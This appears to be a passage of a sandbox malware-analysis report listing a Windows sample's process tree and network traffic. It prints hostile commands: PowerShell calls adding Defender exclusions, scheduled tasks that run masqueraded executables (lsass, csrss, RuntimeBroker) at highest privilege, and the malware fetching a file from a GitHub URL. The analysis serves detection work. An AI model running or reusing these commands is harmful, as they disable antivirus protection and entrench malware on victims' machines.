        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\Application\SetupMetrics\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4532
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Java\Java Update\upfc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2640
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Templates\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\TableTextService\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2928
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4356
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\Registry.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\cmd.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\uk-UA\Registry.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2644
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\u8HczsIKxz.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:932
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:5564
      - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4892
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GTS4B5cy6p.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5540
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:4664
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3940
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\JGN3MoCgVZ.bat"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:60
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        10⤵
        
        PID:2184
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1672
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ezHXLeVHih.bat"
        11⤵
        
        PID:4048
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:5668
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3400
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qwHeC7tSxv.bat"
        13⤵
        
        PID:5636
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        14⤵
        
        PID:4360
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4300
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GTS4B5cy6p.bat"
        15⤵
        
        PID:4676
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        16⤵
        
        PID:5936
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1900
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KLWAYFjljO.bat"
        17⤵
        
        PID:1552
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        18⤵
        
        PID:5684
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:5136
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6Zqs8041Oe.bat"
        19⤵
        
        PID:5400
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        20⤵
        
        PID:3376
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2248
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pkmftNZ3Wr.bat"
        21⤵
        
        PID:2004
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        22⤵
        
        PID:4976
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1112
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\V61H6ynXXY.bat"
        23⤵
        
        PID:2264
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        24⤵
        
        PID:5780
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3940
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ixgWq8OOYW.bat"
        25⤵
        
        PID:3132
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        26⤵
        
        PID:208
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:6116
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat"
        27⤵
        
        PID:5884
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        28⤵
        
        PID:4900
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:6136
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VF9LbKHiRa.bat"
        29⤵
        
        PID:2628
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        30⤵
        
        PID:2536
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4804
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ottjOj3FQt.bat"
        31⤵
        
        PID:5340
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        32⤵
        
        PID:4284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\providercommon\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\providercommon\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\providercommon\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Saved Games\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\Saved Games\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Saved Games\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\providercommon\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\providercommon\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\providercommon\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\providercommon\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\providercommon\upfc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\providercommon\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\providercommon\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\upfc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Templates\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\Templates\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Templates\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:444

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\providercommon\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\providercommon\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\providercommon\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Uninstall Information\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Media Player\uk-UA\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\uk-UA\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\uk-UA\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2556

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

83.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.210.23.2.in-addr.arpa

IN PTR

Response

83.210.23.2.in-addr.arpa

IN PTR

a2-23-210-83deploystaticakamaitechnologiescom
DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

RuntimeBroker.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:26:16 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600089-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863177.857595,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: df104b80f240f744e342f948666ff9e197d1cc87
Expires: Sun, 22 Dec 2024 10:31:16 GMT
Source-Age: 180
DNS

133.108.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.108.199.185.in-addr.arpa

IN PTR

Response

133.108.199.185.in-addr.arpa

IN PTR

cdn-185-199-108-133githubcom
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
